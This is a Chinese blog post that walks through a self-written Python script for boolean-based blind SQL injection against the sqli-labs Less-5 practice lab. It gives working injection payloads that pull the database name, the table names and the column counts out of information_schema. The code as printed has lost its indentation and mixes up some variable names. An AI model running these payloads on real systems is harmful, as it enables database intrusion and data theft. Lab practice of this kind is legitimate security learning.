0x00 前言
此脚本基于sqli-labs/Less-5编写,采用ASCII码判断布尔类型,注入标志为"You are in…"。
第一次独立编写完整脚本,感觉很多地方写的不好。条件分支,字典、列表的遍历都花了很长时间去弄
无论是时间复杂度还是代码可读性,感觉都很拉跨。师傅们轻喷。。。
以下是模块解析
0x01 模块
1.判断数据库库名长度
def db_length():
db_len = 1
while True:
str_db_len = str(db_len)
db_len_url = url + "' and length(database())=" + str_db_len + "--+"
r = requests.get(db_len_url)
if flag in r.text:
print("\n当前数据库名长度为:%s" %str_db_len)
break
else:
db_len = db_len + 1
return db_len
2.猜解当前数据库库名
def db_name():
low = 32
high = 126
i = 1
km = ""
//二分法猜解
while (i<=db_len):
str_i = '%d' %i
if (low + high) % 2 == 0:
mid = (low + high) / 2
elif (low + high) % 2 != 0:
mid = (low + high + 1) / 2
str_mid = '%d' %mid
name_url = url + "' and ascii(substr((select schema_name from information_schema.schemata limit 5,1),"+str_i+",1))="+str_mid+"--+"
response = requests.get(name_url)
if flag in response.text:
km += chr(int(mid))
print(km)
i = i + 1
low = 32
high = 126
elif flag not in response.text:
name_url = url + "' and ascii(substr((select schema_name from information_schema.schemata limit 5,1),"+str_i+",1))>"+str_mid+"--+"
response = requests.get(name_url)
if flag in response.text:
low = mid
elif flag not in response.text:
high = mid
print("当前数据库库名为:"+km)
return km
3.判断表的个数
def table_num():
for i in range(20):
str_i = '%d' %i
num_url = url + "' and (select count(table_name) from information_schema.tables where table_schema='"+db_name+"')="+str_i+"--+"
r = requests.get(num_url)
if flag in r.text:
print("\n数据表个数为:%s" %str_i)
break
return i
4.判断表名长度
def table_len():
t_len = []
for i in range(0,table_num):
str_i = str(i)
for j in range(1,20):
str_j = str(j)
len_url = url + "' and (select length(table_name) from information_schema.tables where table_schema='"+db_name+"' limit "+str_i+",1)="+str_j+"%23"
r = requests.get(len_url)
if flag in r.text:
print("第"+str(i+1)+"张表的表名长度为:"+str_j)
t_len.append(j)
break
return t_len
5.递归猜解表名
def table_name():
tname = {}
for i in range(0,table_num):
str_i = str(i)
for j in range(table_num):
if i == j:
k = 1
low = 32
high = 126
bm = ""
while (k<=t_len[j]):
str_k = str(k)
if (low + high) % 2 ==0:
mid = (low + high) / 2
elif (low + high) % 2 !=0:
mid = (low + high + 1) /2
str_mid = str(mid)
name_url = url + "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str_i+",1),"+str_k+",1))="+str_mid+"--+"
r = requests.get(name_url)
if flag in r.text:
bm += chr(int(mid))
print(bm)
k = k+1
low = 32
high = 126
elif flag not in r.text:
name_url = url + "' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str_i+",1),"+str_k+",1))>"+str_mid+"--+"
r = requests.get(name_url)
if flag in r.text:
low = mid
elif flag not in r.text:
high = mid
tname[str(j+1)] = str(bm)
for key,value in tname.items():
print("[+]| "+key+" | "+value)
return tname
6.判断表中列的个数
def column_num():
for i in range(10):
str_i = str(i)
num_url = url + "' and (select count(column_name) from information_schema.columns where table_name='"+table_name+"' and table_schema='"+db_name+"')="+str_i+"--+"
r = requests.get(num_url)
if flag in r.text:
print(table_name+"表中列的个数为:%s" %str_i)
break
return i
最低0.47元/天 解锁文章
扫一扫
797
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
